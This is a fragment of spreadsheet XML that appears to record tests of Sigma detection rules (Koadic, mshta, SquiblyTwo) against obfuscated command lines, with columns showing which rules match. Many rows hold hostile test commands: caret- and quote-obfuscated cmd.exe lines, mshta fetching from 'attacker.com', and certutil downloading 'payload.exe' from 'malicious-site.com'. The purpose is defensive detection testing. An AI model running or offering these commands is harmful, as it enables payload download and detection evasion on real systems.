          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2592" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2592" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2593" ht="15.75" customHeight="1" s="42">
      <c r="A2593" s="43" t="n"/>
      <c r="B2593" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2593" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2593" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2593" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^Q /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2593" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2593" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2593" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2593" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2593" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2593" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2594" ht="15.75" customHeight="1" s="42">
      <c r="A2594" s="43" t="n"/>
      <c r="B2594" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2594" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2594" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2594" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^Q /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2594" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2594" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2594" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2594" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2594" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2594" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2595" ht="15.75" customHeight="1" s="42">
      <c r="A2595" s="43" t="n"/>
      <c r="B2595" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2595" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2595" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2595" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q -"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2595" s="43" t="n"/>
      <c r="J2595" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2595" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2596" ht="15.75" customHeight="1" s="42">
      <c r="A2596" s="43" t="n"/>
      <c r="B2596" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2596" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2596" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2596" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q /"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2596" s="43" t="n"/>
      <c r="J2596" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2596" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2597" ht="15.75" customHeight="1" s="42">
      <c r="A2597" s="43" t="n"/>
      <c r="B2597" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2597" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2597" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2597" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"^q" /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2597" s="44" t="n"/>
      <c r="J2597" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2597" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2598" ht="15.75" customHeight="1" s="42">
      <c r="A2598" s="43" t="n"/>
      <c r="B2598" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2598" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2598" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2598" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q -"c" "ch" "cp" 1252</t>
        </is>
      </c>
      <c r="F2598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2598" s="44" t="n"/>
      <c r="J2598" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2598" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2599" ht="15.75" customHeight="1" s="42">
      <c r="A2599" s="43" t="n"/>
      <c r="B2599" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2599" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2599" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2599" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /Q -"c" "ch" "cp" 1252</t>
        </is>
      </c>
      <c r="F2599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2599" s="44" t="n"/>
      <c r="J2599" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2599" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2600" ht="15.75" customHeight="1" s="42">
      <c r="A2600" s="43" t="n"/>
      <c r="B2600" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2600" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2600" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2600" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"q" /c c^hcp 1252</t>
        </is>
      </c>
      <c r="F2600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2600" s="44" t="n"/>
      <c r="J2600" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2600" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2601" ht="15.75" customHeight="1" s="42">
      <c r="A2601" s="43" t="n"/>
      <c r="B2601" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2601" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2601" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2601" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /Q -"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2601" s="44" t="n"/>
      <c r="J2601" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2601" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2602" ht="15.75" customHeight="1" s="42">
      <c r="A2602" s="43" t="n"/>
      <c r="B2602" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2602" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2602" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2602" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q /C c^hcp 1252</t>
        </is>
      </c>
      <c r="F2602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2602" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2602" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2602" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2602" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2602" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2603" ht="15.75" customHeight="1" s="42">
      <c r="A2603" s="43" t="n"/>
      <c r="B2603" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2603" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2603" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2603" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"q" /"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2603" s="44" t="n"/>
      <c r="J2603" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2603" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2604" ht="15.75" customHeight="1" s="42">
      <c r="A2604" s="43" t="n"/>
      <c r="B2604" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2604" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2604" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2604" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"q" /c c^hcp 1252</t>
        </is>
      </c>
      <c r="F2604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2604" s="43" t="n"/>
      <c r="J2604" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2604" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2605" ht="15.75" customHeight="1" s="42">
      <c r="A2605" s="43" t="n"/>
      <c r="B2605" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2605" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2605" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2605" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q -"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2605" s="43" t="n"/>
      <c r="J2605" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2605" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2606" ht="15.75" customHeight="1" s="42">
      <c r="A2606" s="43" t="n"/>
      <c r="B2606" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2606" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2606" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2606" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /q /c %x% 1252</t>
        </is>
      </c>
      <c r="F2606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2606" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2606" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2606" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2606" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2606" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2607" ht="15.75" customHeight="1" s="42">
      <c r="A2607" s="43" t="n"/>
      <c r="B2607" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2607" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2607" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2607" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /"q" /c %x% 1252</t>
        </is>
      </c>
      <c r="F2607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2607" s="44" t="n"/>
      <c r="J2607" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2607" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2608" ht="15.75" customHeight="1" s="42">
      <c r="A2608" s="43" t="n"/>
      <c r="B2608" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2608" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2608" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2608" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /"q" -"c" %x% 1252</t>
        </is>
      </c>
      <c r="F2608" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2608" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2608" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2608" s="44" t="n"/>
      <c r="J2608" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2608" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2609" ht="15.75" customHeight="1" s="42">
      <c r="A2609" s="43" t="n"/>
      <c r="B2609" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2609" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2609" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2609" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /Q /c %x% 1252</t>
        </is>
      </c>
      <c r="F2609" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2609" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2609" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2609" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2609" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2609" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2610" ht="15.75" customHeight="1" s="42">
      <c r="A2610" s="43" t="n"/>
      <c r="B2610" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2610" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2610" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2610" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe -"q" /C %x% 1252</t>
        </is>
      </c>
      <c r="F2610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2610" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2610" s="44" t="n"/>
      <c r="J2610" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2610" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2611" ht="15.75" customHeight="1" s="42">
      <c r="A2611" s="43" t="n"/>
      <c r="B2611" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2611" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2611" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2611" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe -"q" /c %x% 1252</t>
        </is>
      </c>
      <c r="F2611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2611" s="44" t="n"/>
      <c r="J2611" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2611" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2612" ht="15.75" customHeight="1" s="42">
      <c r="A2612" s="43" t="n"/>
      <c r="B2612" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C2612" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D2612" s="44" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E2612" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mshta.exe C:\Users\Public\Update.com &amp;&amp; C:\Users\Public\Update.com http://attacker.com/payload</t>
        </is>
      </c>
      <c r="F2612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2612" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2612" s="44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2612" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2612" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2613" ht="15.75" customHeight="1" s="42">
      <c r="A2613" s="43" t="n"/>
      <c r="B2613" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C2613" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D2613" s="44" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E2613" s="44" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\script.hta"</t>
        </is>
      </c>
      <c r="F2613" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2613" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2613" s="44" t="inlineStr">
        <is>
          <t>Suspicious Mshta.EXE Execution Patterns (e32f92d1-523e-49c3-9374-bdb13b46a3ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2613" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2613" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2614" ht="15.75" customHeight="1" s="42">
      <c r="A2614" s="43" t="n"/>
      <c r="B2614" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2614" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2614" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2614" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2614" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2614" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2614" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2614" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2614" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2614" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2615" ht="15.75" customHeight="1" s="42">
      <c r="A2615" s="43" t="n"/>
      <c r="B2615" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2615" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2615" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2615" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2615" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2615" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2615" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2616" ht="15.75" customHeight="1" s="42">
      <c r="A2616" s="43" t="n"/>
      <c r="B2616" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2616" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2616" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2616" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2616" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2616" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2616" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2616" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2617" ht="15.75" customHeight="1" s="42">
      <c r="A2617" s="43" t="n"/>
      <c r="B2617" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2617" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2617" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2617" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2617" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2617" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2617" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2618" ht="15.75" customHeight="1" s="42">
      <c r="A2618" s="43" t="n"/>
      <c r="B2618" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2618" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2618" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2618" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2618" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2618" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2618" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2618" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2619" ht="15.75" customHeight="1" s="42">
      <c r="A2619" s="43" t="n"/>
      <c r="B2619" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2619" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2619" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2619" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2619" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2619" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2619" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2619" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2619" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2619" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2620" ht="15.75" customHeight="1" s="42">
      <c r="A2620" s="43" t="n"/>
      <c r="B2620" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2620" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2620" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2620" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2620" s="44" t="n"/>
      <c r="J2620" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2620" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2621" ht="15.75" customHeight="1" s="42">
      <c r="A2621" s="43" t="n"/>
      <c r="B2621" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
